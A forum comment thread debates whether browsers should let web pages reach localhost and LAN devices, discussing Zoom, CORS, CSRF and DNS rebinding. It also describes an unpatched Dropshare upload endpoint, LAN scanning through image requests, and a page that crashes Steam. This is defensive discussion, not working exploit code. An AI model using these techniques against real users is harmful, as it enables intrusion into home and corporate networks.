I posted about another macOS app called “Dropshare.app” a few days ago [1].
I didn’t bother to write a blog post about it because my English is not good enough.
Basically, anyone who uses this app is vulnerable to cross-infection and data leaks. Assume that user John installed this app, then hacker Alice tricked John to visit their malicious website. In this website, they added code that sends requests to “http://localhost:34344/upload” to upload malicious files to any of the services that John’s computer is connected to via Dropshare, this includes private servers via SSH, Amazon S3, Rackspace Cloud Files, Google Drive, Backblaze B2 Cloud Storage, Microsoft Azure Blob Storage, Dropbox, WeTransfer, and custom Mac network connections. The port number is also static, saving the hacker the need to run a port scanner.
I already contacted Dropshare’s developers to fix the issue, but got not response.
Certainly. I'm a non-native speaker myself and although the end result looks somewhat convincing, it takes me an inordinate amount of time to write, look up words and proofread the text. I'd guess a native would come up with a comprehensible text at the first try, and it'd take a few tweaks until it looks immaculate. The reason non-natives seem to write better is that we simply spend more time working on it, and fix a lot of mistakes.
Just now, writing this, I had to look up if the saying went "inordinate amount" or "unordinate amount". The difference between "pristine" and "immaculate". It really adds up when writing longer texts.
Regularly consulting reference materials and editing your work are hallmarks of a good writer. It enables continuous improvement.
For what it’s worth, I think your examples are nuanced questions about fairly sophisticated terms. I look up similar things all the time, and I am a native English speaker, have a first-class education, and write regularly for my day job.
Agree with the existing reply, and I appreciate that the effort is significant for you. But it's also worth noting that everybody would have still gotten your meaning if you'd swapped that 'i' for a 'u'. In a technical document a subtlety like that is important; in a forum post, things can slide around a bit. I'm a native speaker and I'm sure I make mistakes like that. Certainly I do in speech.
I’m intrigued by https://www.grammarly.com/ but it sends everything you write to their cloud service, which is completely unacceptable to me. If I can’t use the tool for proprietary and private writing, it’s useless.
I found a malware on a JavaScript errors notifications for Chrome in 2015 that affected 86k users and the developer was mad because apparently he made some money out of it (I was called a paranoyd).
The malware basically logged your accessed URLs and solt it to a statistics service called Fairshare.
Agreed with the other comments, this comment = blog, looks like you know what you're talking about, short, to the point.
Good find, and thanks for sharing
off topic comment:
For all, what are people blogging on these days? I am not too fond of Medium, but I just got into Ghost and really liking it. It seems like a great short post / resource to write something. I have it installed on a cheap DO server, plain text like lapcat?
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
I'm sorry but WtF who is this guy, every web developer will know this, and every developer should expect it since it's just an extension of basic networking knowledge applied to web browsers. It's not horrifying, it's basics, a great many things have depended on this fact to function for a very long time.
Yes functionality can work against you when abused, no this is not a special case.
This is Hacker News. We all know this. That's not the point. The point is: is it reasonable in 2019 that websites you visit can make requests to devices on your local network?
To be honest I'm not sure. But I sure think it's a relevant discussion to have.
There's no uniform criteria for "local network". I can create a local device at any address I want. These days most are within 192.168 and 172.17 and 10., but not all.
As an example of legitimate use, Ubiquiti routers have a web app at ubiquiti.com that opens connections to manage your local routers. It's all authenticated with cookies. It seems like a good design.
> There's no uniform criteria for "local network". I can create a local device at any address I want.
Certain subnets are always private [1], and thus may safely treated as “local”. But, of course, non-private addresses could also be local, but that’s less common in a non-enterprise setting.
This isn't a local network issue though, this is a cross origin issue that Browsers definitely need to patch.
A script from the internet should not be allowed to interface with a script from local network (localhost, local intranet e.t.c)
The browser should have strict sandboxes. This is like when you load a site over https, browsers scream at you if you load a http resource saying it's insecure.
Cross-origin is based on the domain name. It offers no protection against an attacker poking your local IP addresses.
You can have multiple IPs for a domain name, so if I set "hack.tlb.org" to include both a server I control and 192.168.1.1, I can repeatedly do fetches from "hack.tlb.org" until one of them gets your router instead of my server. And they're in the "same origin" for CORS purposes.
You log into app.plex.com, which will connect to yourserver.account.plex.local or something like that, which resolves to an IP on your LAN. Your server will then feed the web page app with data, without going via your WAN link.
Thanks - I had no idea that Ubiquiti webapp existed!
How about those internal-by-spec ranges + localhost as "security popup/alert" in major browsers? Or default deny with a popup to allow?
I really struggle to see why "legitimate use" that's a minority of all use cases should forbid a consensus from cordoning off a major attack surface with an affordance for that legitimate usage.
It isn’t really a “major attack surface” and it would be better to configure routers to rewrite DNS responses within the subnet that they control by default than to add an arbitrary set of rules to browsers, breaking all sorts of developer tools and other useful functionality.
Also, legitimate services on the local network have tools like CORS and CSPs as well as standard anti-XSS and anti-CSRF techniques to use to defend themselves.
Wait, which is easier/more feasible - adding security to browsers which restricts a fringe usage, or corralling all the router manufacturers to update their software to rewrite DNS responses? Wouldn't it result in the same outcome anyway?
Based on history I know which group I would expect to implement first.
Some larger companies use public IP addresses for everyone's desktop, but they're still behind a firewall. So these are "local" in the sense of behind their firewall, despite being "publicly" routable addresses.
An attacker can create a domain name pointing to any IP, including 127.0.0.1 and 192.168.1.1. So browsers won't gain any security by looking at the domain name.
Totally agree. I don't think it makes sense for an arbitrary website to send requests against shitty IOT devices in someone's home, for example. Yes, you could argue that mom should be putting her IOT devices on a VLAN, but come on. The obvious, ethical solution is for the browsers to implement this layer of protection and make it obvious to the users when an access is attempted.
1: not everyone is a software developer here and 2: not everyone is a web developer. I've barely done front end stuff and do almost exclusively backend stuff so I didn't know that.
So does that mean any tab I have open on my computer can try and talk to my local development mysql server and my local development web server? That's crazy. Wasn't there also an article in the past year about how a bunch of IOT devices run unsecure on LAN because they assume they are secure?
It’s interesting you say this. I work as a web developer, I consider myself to be more or less well versed in security, and it would have never occurred to me that websites can make requests to devices inside the standard private blocks of addresses. I think it stands to reason that these requests should be blocked in the same way requests to the file:// protocol are blocked.
There are. Let them set a setting or confirm on a popup. The vast majority of web users do not want this.
Similarly, there are legitimate reasons why I might want to access a service with an invalid SSL cert. They're rare and should be discouraged for general users.
Vast majority of users don't want CSRF-able software either. Let's first discourage such garbage software before making workarounds. In addition to that, those workarounds most likely will not eliminate all the possible issues and buggy software still gets exploited.
This isn't about 'garbage software'; it's about the expectation that a local LAN is not exposed to the Internet and therefore does not need the same security controls that an Internet-facing network does.
Browsers making requests on the LAN breaks this expectation.
Before someone says "but I don't expect that", well, why do you even have a firewall? With the notable exception of Google/BeyondCorp, practically every LAN in the world expects to trust its members. Having untrusted code in browsers able to send requests on the LAN violates that expectation.
a) You can't establish a plain TCP connection with arbitrary content using a browser.
b) Excepting LAN to be always secure, or okay to keep unsecured is a terrible assumption that has been proven wrong numerous times, it is time to trash that assumption once and for all.
Implementing CSRF doesn’t stop an outside party from finding out that you have (for example) an AppleTV inside your network. The device will still return a HTTP status code. You could legit spy on end users this way. A real boon for ad tech, too.
Such specific detections could be countered by Apple, it serves no good adtech purpose if they can determine some small amount of devices existing on a LAN.
In general though, this isn't be a problem on proper IPv6 LANs and instead of buggy and cumbersome workarounds being built into browsers we should just switch.
> How is the browser supposed to reason about "local"?
That isn't even the issue. It's that there is nothing inherently wrong or unusual with mixing local and internet requests.
Look at IFPS -- it runs a webserver on localhost which you can request content from by using content hashes. There is nothing wrong with a website on the internet which anticipates that you to have IFPS installed and uses it to request page elements. It can even use javascript to detect that you have it and use a different (e.g. slower or more expensive) source for the content if you don't, or show a message explaining how to install it.
Or you have a company with some internal servers where some of them have public addresses (or public IPv6 addresses) while some don't, but they arbitrarily access resources on the others because they're all managed by the same people.
This isn't a browser problem. Browsers are supposed to work this way.
Yes, exactly. This should be a top-level comment. The uninformed delirium over intentional and useful browser features moves us in a slow crawl towards a sad husk of what the Web used to be in the name of 'security'.
The web has changed. It has become a vastly more hostile environment. In my view, the appropriate way of acknowledging this change is to prioritize security over features. Whether a feature is useful or not is no longer the primary consideration.
A denial of service doesn't improve security. All you do is get users to mash whatever knobs they can find until it starts working again regardless of the implications, or disable updates so they can keep using the old version that works instead of the new version that doesn't.
You need to fix the things that are broken instead of breaking the things that are working.
There are 3 well defined private network ranges, 1 loopback range and a few other random things. It's not silly to ask whether an address outside of them should be able to initiate connections to them. (In the context of a browser running on that network that is)
I would suggest that all requests must require a DNS lookup. No requests directly to IP addresses, full stop.
This prevents LAN enumeration from random websites. This is not a big deal for most home networks, but I shudder to think of the damage one could do in a standard corporate network.
It doesn't help with routers with well-known config URLs.
Yes, I realize that this will break a bunch of stuff.
(Edit: OK, DNS rebinding mostly breaks this proposal. Let me think about this harder.)
How would this help at all? You could just have your domain return LAN various LAN ips for different domains... there are already a ton of domains that return 127.0.0.1 for you. It would be trivial to make your own to do every possible IP.... something like 127.0.0.1.myfakedomain.com, where it dynamically extracts the IP and returns it.
So, when a company decides to run internal services for its non-technical employees on its internal network, now they have to make sure that all the user’s devices on the LAN (including BYOD devices) are configured properly?
Cool, so make it drivable via policy files like e.g. client cert pinning in Chrome. Industry has solved these problems, making excuses for fixing it is not good at this point.
What if your DHCP doesn't give you a private IP address? When I was at the University of Michigan, my personal laptop always received a public IP address. Or if I'm in a pure-IPv6 setup, using prefix delegation/SLAAC? This problem is a lot harder than "just use the RFC1918 list of reserved private IP ranges".
The UMich network isn't "improperly configured". NAT-less networks have been around since the beginning of the Internet, and IPv6 networks don't use NAT (unless they're accessing IPv4-only targets, but that's CGNAT). I think you'll find a great deal of university/research settings have networks configured without NAT. If you can come up with a solution that works in all cases, I'd love to hear it.
So web browsers are user agents, i.e. they act on your behalf. This is great because we can avoid heated arguments about what websites "should" or "shouldn't" be able to do as it's ultimately up to the user.
I assume you've already setup the relevant browser settings and extensions to enforce a user-defined CSP that blocks all further requests? If so, then great, your browser won't make any requests when you visit sites. And my browser will (apart from what I've blocked with other more selective extensions). We're both happy.
This is not ad hominem, this is me calling out a person's shallow criticism of a technical detail with no attempt to understand the history and background of one of the most unobscure features of networking, and the audacity to proclaim to the world how shocking and terrible it is.
It's essentially 2nd order ignorance, it's not personal, it's relevant to the validity of their argument.
Users need to follow the site guidelines regardless of how ignorant someone else is or how strongly you disagree. Maybe you don't owe the author better, but you owe this community better if you want to post here.
The online calling-out and shaming culture is particularly unwanted on HN. It has a degrading effect on the community.
> a great many things have depended on this fact to function for a very long time
Such as? Breaking "website makes a call to local (localhost or RFC1918) web server" would be a feature; any use of this is an abuse. It'd take a transition period and some careful opt-outs, but any kind of call to a local web server should require the same kind of special privileges a browser extension needs, at the very least.
It's a bug. Calling it out is the right thing to do. If you're complaining that the author should have known about it already, then you're just mocking someone for not already knowing a particular fact; that shouldn't stop them from writing up a report on it and trying to get it fixed.
EDIT: please note that I'm talking about calls from Internet origins to localhost/RFC1918 origins here, not calls from one Internet origin to another or one localhost/RFC1918 origin to another.
This is not a bug. It is a feature. It's called a cross-origin request and numerous websites depend on it. The recipient website needs to be CORS enabled, so it is secure. The author's report is misinformed, and pretending Apple should implement some feature outside of standards is silly. Yes, this feature could be improved, but not by disabling it or by making Apple become standards non-compliant
I feel that the distinction between internet and local is unnecessary. Isn't it equally bad if someone sends a request to your CORS-broken local webcam as it is if they send a request to your CORS-broken bank account?
Or does SOP not apply to local addresses?
I think for all cases it could make sense to enable the user to also approve CORS requests instead of just the cross origin website itself (since they are often insecure).
> Isn't it equally bad if someone sends a request to your CORS-broken local webcam as it is if they send a request to your CORS-broken bank account?
This comes from the same line of thinking as "shouldn't every device have a routable IP?". Yes, in theory, but a long history of not having one has made people more lax about local systems and securing services. And until the vast majority of local services address their security issues, we shouldn't make them accessible.
> Or does SOP not apply to local addresses?
It should, but that's not the world we have. Yes, we should fix the million local devices with CSRF/CORS/etc issues. We should also have an extra layer of protection in web browsers to prevent this. Defense in depth. (And note that many local devices do this intentionally, to give a website more permissions, as in the case of Zoom. The local web server wants to make itself accessible to the Internet; browsers should prevent that.)
This complaint is real cute, but the trite answer is that this is how things have worked for a long time. Awareness of it is spreads for a while whenever high-profile events receive media and blog coverage, and perhaps the exploitability of this has increased compared to several years ago when products that opened up various HTTP-accessible servers were less common (or secured by obscurity).
This isn't necessarily an excuse to not explore mitigations through consensus in future browser behavior -- after all, that process of loose but eventual consensus of incremental UX and airquote "security" improvements is how SOP and CORS and C-S-P came about [1] and the cookie saga evolves [2][3].
But consider that legitimate uses of cross-domain requests to localhost exist (e.g. an OAuth callback endpoint), while also keeping in mind that users from all walks of life are, perhaps unbeknownst to them, are managing LANs of computing devices running dozens of servers, often with modern encryption such that communications between the program and the remote server are becoming harder to intercept and oversee, and lack a comprehensive capability to monitor, analyze, blacklist, whitelist, or snipe traffic in a way that's not cumbersome or borderline user-hostile. Such is the world where we've arrived. Etching away on one or two widely deployed corners of it won't fix the overall landscape, even if it may significantly reduce the change of "drive-by" exploitation through websites accessed through commonly used browsers.
First, I think this is right and that websites shouldn't be able to hit any localhost or private address spaces.
But this leads to a bigger question, what makes private address space special? Not really all that much. Running an internal network using public addresses isn't super common these days but isn't uncommon by any stretch. Does it make any sense that any website on the internet is allowed to hit any other site accessible by your machine that uses a public address? There is definitely a security boundary being crossed here.
Say for example I run a web service that's private to my work's office. So spin up a machine on my VPS account, give it a public address, and lock down the firewall to my office's address range. Someone running Spotify in browser shouldn't have to worry about a malicious page hitting a potentially sensitive internal service.
Does it make any sense for me have to establish a VPN connection to my VPS for the sole purpose of giving it a private address so browsers will block it? Ew. I could also configure a CORS policy but we're talking about a service that used a trick to bypass this protection -- and plus nobody knows how to set that up right anyway.
By default, browsers do block sites from doing dangerous things to other sites, like sending authenticated API requests; they only let by stuff that is supposed to be harmless, like hotlinking images. And then they have a mechanism called CORS that lets those services say "this particular site can make API requests and such".
The problem is that Zoom, since they didn't understand CORS, and yet did want to allow their site to make API requests, turned what should have been an harmless action (GET an image) into a dangerous one.
Browsers could block everything, but all I think would happen is that Zoom would just find some other silly (and potentially more dangerous) way of doing the same thing, because they want the site to be able to talk to the service.
If you're writing your own service to be used on an internal network, you don't need a VPN or anything. Just don't accept unauthenticated requests that make changes, and ignore CORS.
> Just don't accept unauthenticated requests that make changes, and ignore CORS.
The problem here is that it’s really pretty trivial to scan a local network and get valuable metadata about the router and other devices on the network, just using JavaScript and xmlhttprequest. It’s not that the local services are at risk of being exploited, but the whole (average, unhardened home-) network could be compromised by identifying devices with known exploits and, well, exploiting them.
Now I’m trying to come up with a non-PITA way of isolating browsing from my local network while still allowing direct access to my local network!
> Now I’m trying to come up with a non-PITA way of isolating browsing from my local network while still allowing direct access to my local network!
UMatrix will protect you from most of this (with the exception of DNS rebind attacks).
I don't necessarily disagree with people who are frustrated that their browser can do this, but I also think it's completely reasonable to make it easy for browsers to send requests on an intranet. There are multiple devices in my house that wouldn't work with that capability.
The "problem", to the extent that there is a problem, is that securing these devices relies on developers doing the right thing -- and developers are untrustworthy. Theoretically, it would be better to put users in control. But that's not a specific problem with Intranet requests, that's a problem with CORS in general as it applies to the entire Internet.
> it's completely reasonable to make it easy for browsers to send requests on an intranet
Agree. But shouldn't we distinguish a request that originates from the local user's input into the browser from one that originates from a remote entity? I'm slightly ignorant here; maybe this isn't technically possible?
It's always been the case, back to NCSA Mosaic in 1993, that web pages could hit URLs of local web servers. Before javascript, you had to use an embedded image, like:
Fortunately, most protocols bail out on the first 4 bytes "GET ". One of the reasons that Gopher support was phased out was that you could make a gopher request contain more or less arbitrary bytes and attack many local servers.
Servers have always had the burden of defending against this.
I believe some networking equipment let you go to "www.routercompany.com" that loads up the router's config webpage without having to remember its lan IP.
How do you differentiate between a valid and invalid request to localhost / the LAN?
Lots of websites will link to something like `http://localhost:9200` (e.g. Elasticsearch) in the documentation.
So you decide to make it impossible to load that page in the context of a page loaded from a public IP address. Great.
What is stopping them from tricking you into clicking it (or filling out a fake form), which is basically the same thing?
You haven't really solved the problem. You've just made it slightly more difficult.
The solution is:
a) fix your applications so that they do not expose unsafe endpoints that can cause unintended side-effects merely by navigating to them
b) stop using session cookies (at least stop using them alone) to authenticate actions. Use token-based authentication (like CSRF tokens)
Edit: and before you say "check the referer header!", no, that will not solve the problem. The bad web page can simply not include the referer with something like `rel="noreferrer"`
> How do you differentiate between a valid and invalid request to localhost / the LAN?
With the same origin policy? I think the post advocates for something like allowing localhost and private IP addresses only from those very same addresses or from the URL bar. Any other page shouldn't be able to access them.
This will probably break something but what's the case for a web app to legitimately access local host? Maybe access to some local service installed by the user and managed "from the cloud".
Define "access". The SOP does not stop a page from initiating a request to any other origin, it stops it from interacting with it, so that, e.g. attacker.com cannot steal your session cookies from banking.com
You can do all kinds of things that don't violate the SOP but initiate a request:
- Link to another site
- Redirect someone to another page using Javascript
- Link an image from another site
- Put a form that submits data to another site
- Embed video/audio from another site
- Embed an iframe from another site
Do you propose disallowing all of those things?
There are plenty of legitimate use cases for all of these things.
If you wanted to do this you would have to disallow any type of links to local servers.
Every one of those are solved by CSP/X-Frame-Options headers, CORS headers with content-type (non-normal form content-types) checks and proper handling of HTTP Methods. DNS rebinding is solved by https, and if you are doing something sensitive over a network (even a local one) I'm going to assume https is the proper way.
We have ways of handling these things, they just require a bit of reading/implementation and are unfortunately non-default.
Which is sort of exactly my point. There is no need to have a blanket ban on any linking between local/non-local sites. You just need to make sure they are set up to handle requests securely.
Also, like someone already mentioned. DNS rebinding is a thing. So the SOP can be subverted under certain circumstances (browsers will do DNS pinning to protect against this but it's not a perfect solution)
A confirmation might be helpful, yes. I think the challenge is to design a standard for that which won't completely flood people with warnings. I'm sure there are some "enterprise" applications that will load a ton of different resources from different services on an internal network. So would you have to click a confirmation box for every single one? Or would there be a way for administrators to disable it somehow?
There are legitimate reasons to open a webserver locally. However, the benefits from these restrictions are great not to consider some sort of protection. Perhaps there could be an authorization request the user could allow (similar to how we got rid of the pop-ups) in the most natural way possible (we don't want to break intranets, for example).
Another security-related bad pattern that annoys me is how some of this authorization stuff steal your focus making it impossible for you to ignore them (like, you cannot move to another tab before deciding to allow or not something).
Another thing is how sometimes it is not completely clear if something is an element of a website or your browser or system. For example, imagine you have to type your user password for a random update to complete, but you are browsing some website... Suddenly you see a prompt with your username and a password field matching your system's... However, you can only know for sure this isn't phishing if you try to cmd+tab and it is still there. Heck, the system should try to detect you are on a window showing unsigned/unsafe content and paint something out of the frame (like coming from the top address bar) so you can easily identify it's legit (because a website shouldn't be able to print a portion of your screen outside of 'window').
> In my opinion, web pages should not be allowed to make requests to LAN addresses unless the user has specifically and intentionally configured the browser to allow this.
Is there a way to know definitively if an address is "local" rather than "wide"? Should that be more granular, e.g. host, LAN, WAN? How does that work with bridged networking and such?
If I'm already browsing something on the LAN, it seems reasonable to be able to browse other sites on the LAN. But then that seems like an overly broad definition of LAN would allow privilege escalation.
If I saw a private IP (192.168, 10, etc) or a .local domain, I'd assume that was a LAN address, but that's a convention and depends very much on routing being set up properly.
> If I saw a private IP (192.168, 10, etc) or a .local domain, I'd assume that was a LAN address, but that's a convention and depends very much on routing being set up properly.
This convention on the address is actually backed by RFCs. eg. rfc 1918. There is similar for ipv6.
However, blocking traffic to private IPs without careful consideration seems like it could block some legitimate use. So one does have to tread carefully when special-casing those.
I knew that localhost could be accessed, but the fact that local IP addresses on the LAN can be accessed is actually quite surprising to me. I suppose it makes sense, but it definitely makes me much more concerned with the security of local devices on my home and office networks now.
Are there any best-practices for keeping things locally safe (i.e. LAN devices like printers, testing boxes, tvs etc.) , beyond just treating them the same way you would an external facing machine?
Yes, there are quite a few attacks on default local credentials for home routers because of this. Now if only home routers were better about actually following through on changing credentials..
Yeah, forget about home, this is a nightmare. Who knows how many devices are in a corporate network. Internal networks are usually not as well protected as the perimeter.
Jonathan Leitschuh shared the same complaint in his original writeup of the Zoom Zero Day, but also mentioned CORS-RFC1918 – a proposal to obtain permission from the user before allowing a public website to access a resource that DNS lookup reveals to be hosted on the private or local address space as defined by RFC1918:
Wait wait WAIT! It is much more complicated than that.
You can make XHR (aka ajax) requests only if the CORS policy allows it (concretely, this local web server you are trying to access is answering with a specific HTTP header saying "I authorize the website xyz.com to send XHR request to me via the web browser of the client of xyz.com).
Now for everything outside of XHR(ajax), you can send different type of requests :
<script src="..."></script> but this let you only load js files.
<img src="..." /> but this lets you only load images, you can't really do much other than try to load images with that.
So if you get into the detail of each "web api" (XHR, <img/>, <script/>, etc) you will see that you are actually very limited.
I worked in a company that used custom DNS names to identify the environments:
- www.mydomain.com
- stage.mydomain.com
- local.mydomain.com
The last one referred to the version of the app that developers ran on their own machines. So they had a DNS-level entry that sent local.mydomain.com to 127.0.0.1.
This isn't a browser issue at all. I think the security issue is "applications can install local web servers" and "some local web servers are insecure".
We already have XSS controls in place to prevent a domain from accessing the contents of another browser window or an iframe.
It's not a browser issue. There are plenty of legitimate reasons for wanting a browser to access a local web server. It might not be common, but it's not illegitimate nor a security issue.
Yep, I have a sub domain under a personal domain pointing to a few a few specific specific 192.* addresses and localhost. It makes it easy to test HTTPS stuff without having to jump through hoops (and with Let's Encrypt it's free).
> In general, there's no reason why a page on the internet should be allowed to access devices on your local area network. Of course, if the user enters a LAN IP into the browser location bar, this should be allowed, but that's not a cross-origin request.
What's a local area network? 10.x.x.x? That's going to break VPNs and enterprise integrations in a variety of ways. With IPv6 it's even less predictable.
The solution to this problem is CORS — accessing LAN servers, or any cross-origin destination, requires affirmative consent from the LAN server in the form of the Access-Control-Allow-Origin header.
Perhaps I should have said "The solution to this problem is _properly-implemented_ CORS." My point is that browsers already have a mechanism for mitigating this particular problem and I don't think the additional proposed mitigation (restricting browser access to localhost/LANs) would break a lot of legitimate usage without much benefit.
There's only so much browsers can do to mitigate hostile code running on the machine. CORS won't save me if Zoom decided to wipe my hard drive, you know?
You is you. The user.
I do not control the zoom local server, and I do not control what the zoom server answer as the cors header.
Having cors enabled in my browser do not save me from anything in this case.
I was too wondering about how this could work in IPv6.
There is no equivalent of RFC1918 for IPv6 and filtering link-local addresses won't do much as every host on the LAN is still adressable by its publicly routable address. These are probably too hard to predict, though.
You mean with image requests or something, right? Actual fetch() and XHR won't even tell JavaScript that a server exists unless it passes the CORS preflight check.
I don't see any problems here. Even though they are on the same LAN, they are still on different host, thus subjecting to CORS restrictions.
That is, as long as your devices on LAN do not send a access-control-allow-origin header, the web pages are not capable of getting the actual response. Also, the only http method available to them is GET (when preflight is not required) and OPTIONS (when preflight is required), which are methods that are almost always side-effect free and only return some value - which the script cannot even get due to CORS restrictions.
I do agree in principle that web browsers probably should not allow non-local web sites to make requests to local IP addresses.
However, I don't really see that as the fundamental problem with the Zoom web server. They just happened to use local web requests to externally trigger the Zoom application, because it's probably the most convenient to implement. But couldn't they have, at least in theory, had the Zoom application snoop on the display output until it finds an image of a QR code and open a conference call based on the data in that QR code?
Obviously that's a more intensive listening mechanism, but my point is that the fundamental problem seems to be that their application installs a backdoor that is designed to expose the webcam without confirmation based on user actions that do not necessarily imply intent (like clicking on a web link). The local web request thing is really just an implementation detail: one that probably should be fixed by browsers, but far from the only way Zoom could have implemented this feature.
After all, the Zoom client could just have a socket connection to Zoom's servers, and start a conference call whenever someone requests one. That's how all native apps for conferencing/message work. They just usually require confirmation from the user, and they usually (I hope) uninstall that process when I uninstall the app, so people tend to be less upset.
DNS rebinding attacks leverage this very behaviour. And they exist since years. Nothing new. And I think fixing the approach is complex and error prone. I can still make the browser connect to myhost.mydomain.com and have it resolve to 127.0.0.1 - what then?
Of course if your local webservers have a really open CORS header, that could be a problem. But it's a matter for local webserver, mostly. And DNS rebinding still applies.
To mitigate this, I configure my LAN’s DNS server to drop records which specify local or private addresses. Of course, this doesn’t help outside my LAN. In Unbound:
I recently posted a blog post that exposed a similar issue involving Chrome extension. The issue in particular is how LinkedIn makes local web requests to try an identify which extensions you have installed: https://prophitt.me/articles/nefarious-linkedin
This approach was used for years by Spotify[1], to allow websites embedding their player to load content directly into a running instance of the desktop app.
The browser doesn't know by default what websites should be accessed. They don't know that l337haxor.dev doesn't have access to api.bank.com but bank.com does.
Instead it's the server at api.bank.com 's responsibility to tell the browser it only accepts requests from bank.com.
It is absolutely the job of the server to determine the source and validity of a request. Web browsers, for better or for worse, fundamentally allow websites to make requests to other sites. "Rogue" websites can "trick" users into requesting images, videos, music, javascript, stylesheets or trick users into making POST requests to your site. This is why tech like csrf tokens exist.
Pretty much all modern browsers allow access to localhost, even from TLS pages. They treat localhost as though it were TLS so it's not even demoted to "mixed content".
And beyond that they also allow mixed content for asset requests from TLS pages to non-TLS URLs of any IP address (for instance an AT&T modem configuration page at 192.168.1.254).
But it was able to successfully ping my running Steam Client. The page works like an acid test; if it's clean, you're clean. If it finds something, it says what and the port.
Real fun times is the fact that -on Linux machines- something like this will cause Steam to freeze and even crash certain games just by visiting the page: https://wybiral.github.io/steam-block/
Zoom got around the CORS restriction by requesting an _image_ which is not subject to CORS. So there are some limitations of what can be done and how you can access things. But you could certainly use this technique to do some simple IP/port scanning on a user's local network.
Just to be clear: There's no need to "get around" CORS in the Zoom case. Browsers simply allow cross-domain GET and POST requests. Period.
CORS mediates the ability of JavaScript running in one origin to _read_ responses from another origin. If Zoom wanted JavaScript on any site to read data from the local installation, their local web server would need only return appropriate CORS headers. This was not necessary for the use case of joining a meeting.
This is my understanding too, but judging from the comments in this thread, either a lot of developers aren't clear on the difference between CORS and CSRF or else they're referring to aspects of CORS I'm not familiar with.
It is true. But then, it's an intentional bad design choice by whomever wrote the server. If your server does actions on a GET, or accepts POSTs without a CSRF token protection, that's not the fault of the browser, but a well known behaviour.
"simple requests" are exempts of CORS. Images is one way, but any GET request without special headers and with a specific subset of content types will quality and are exempts from CORS. Certain simple POSTs too if my memory's not too bad.
It is beyond sad that this was upvoted on HACKERnews. This is an intentional feature of web browsers and a specified feature of web standards. Could it use improvement? Maybe. Should we disable localhost requests from webpages? Abso-fucking-lutely not.
"Is this possibility not surprising to you?"
> no
"It was surprising to me!"
> that is because you don't understand the web
"The problem is actually worse than this."
> I wouldn't call it a problem
"The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network!"
> Yes, that's called conforming to a standard and it took years of work to get them all to behave the same.
In other news, the sky is blue, trees are green, and shooting yourself in the foot still makes you bleed.
I'm interested in learning more about the use cases and standard for this, because, yes, I don't perfectly understand the web. Can you share your knowledge and point to resources that I can read?
CORS allows websites to specify which resources (other than their "same origin") can access their information. A simple is how jquery allows any website to access jquery scripts from their CDN.
CORS also works on the local network, or even localhost, as the author has discovered for himself here. Uses in these spaces are less ubiquitous, but if you have ever needed to set up a web enabled resource in these spaces, you may need CORS. I'll give some theoretical uses here:
1. A company sells routers. They host a webpage at company.com that makes requests to your router at <scary ip>
2. A company sells a big, expensive hardware component that attaches to your computer. To manage this component, they set up a website at company.com, and the component sets up a website on your computer. Company.com makes requests to localhost, to manage that big, expensive component.
The actual issue here is that companies setting up these websites at localhost and in your local network do not securely set up CORS (see Zoom, other issues). Although it would be unreasonable to kill these use cases, it would be reasonable to require the user of the browser to check off that a localhost or local network request is okay.
Simply disallowing access to private network space is a non-starter, since it’s used so frequently. For example, a typical use case is that an office has a private IP space, e.g. 10.0.0.0/8, and various external services will link into it, e.g. Gmail, Okta.
Disallowing access to localhost seems more plausible, especially if there’s an exception for extensions so that things like 1Password can continue to work.
The onboard passive hydrogen maser and rubidium clocks are very stable over a few hours. If they were left to run indefinitely, though, their timekeeping would drift, so they need to be synchronized regularly with a network of even more stable ground-based reference clocks. These include active hydrogen maser clocks and clocks based on the caesium frequency standard, which show a far better medium and long-term stability than rubidium or passive hydrogen maser clocks. These clocks on the ground are gathered together within the parallel functioning Precise Timing Facilities in the Fucino and Oberpfaffenhofen Galileo Control Centres. The ground based clocks also generate a worldwide time reference called Galileo System Time (GST), the standard for the Galileo system and are routinely compared to the local realizations of UTC, the UTC(k) of the European frequency and time laboratories.
We can debate over whether or not browsers should work this way, but if you're reading this and are technically inclined, the best immediate right-now takeaway is that your intranet isn't perfectly secure.
As always, you should practice defense in depth and work to secure your internal network from potential bad actors attacking from within your internal network. NATs offer you partial security and make some attacks harder; but you can't just throw up a private web server without authentication and say, "it's on a NAT, so it's secure."
This is especially true in the IOT world, where the threat to your network may not even be coming from a browser/website. Multiple layers of defense are the way to go, because no single layer is impenetrable.
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
I guess this should serve as a cue that there is something off in what you are writing. You did not just discover a major security flaw in all web browsers while not being an experimented (at least web) software engineer.
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
Wait, what? Is this sarcasm? This is by definition how networking operates.
I hope not. The whole point of the web is that you can link to anything and make requests to any service. Forcing websites to be walled off from each other just because some servers aren't secure would suck.
The author points out Safari's handling of this, but in reality, I think you'd need to address this on a per-browser basis. Zoom said they added this behaviour _because_ Safari added a confirmation which Chrome (and presumable others?) did not have.
Pretty much everyone involved in the infosec community has known and understood this for the past 20 years or more. I'm not sure how this can make things any worse. If anything it will make things better because now more people are learning how the web is actually designed, right?
Some how I missed the word “hat” there and had to reread that a few times... was trying to figure out why a couple of dodgy apps had escalated into a race war haha
noscript ABE guards against this in its default configuration. Unfortunately, I think the feature is only in the legacy addon version, not the post-quantum one.
To be fair, this is a slightly different issue. External websites can presumably link to file:// or localhost URLs (the one in your comment works fine from the HN website), but they can't transmit any information about the resource back to their servers. That's also true of images (unless the server serving the image allows it via CORS).
An evil web page at example.com/evil can certainly contain an img tag for http://localhost/me.jpg or http://dropbox.com/private-photo.jpg. You will see your private images displayed on their web site, but while that may be disturbing (or even useful for phishing), the evil web page cannot transmit the image data back to itself. For example, it can't use JavaScript to load the image into a canvas, base64 encode the canvas, and POST it back to itself, because the canvas will become "dirty" as soon as the image is loaded into it, and the browser will not allow JavaScript code to dump a dirty canvas to any inspectable format.
They can redirect you as well (or you can put a non-image inside an image tag). Which means you have to make sure it's safe to merely navigate to a page/resource, otherwise you have a "Confused Deputy" vulnerability (i.e. CSRF).
I didn’t bother to write a blog post about it because my English is not good enough.
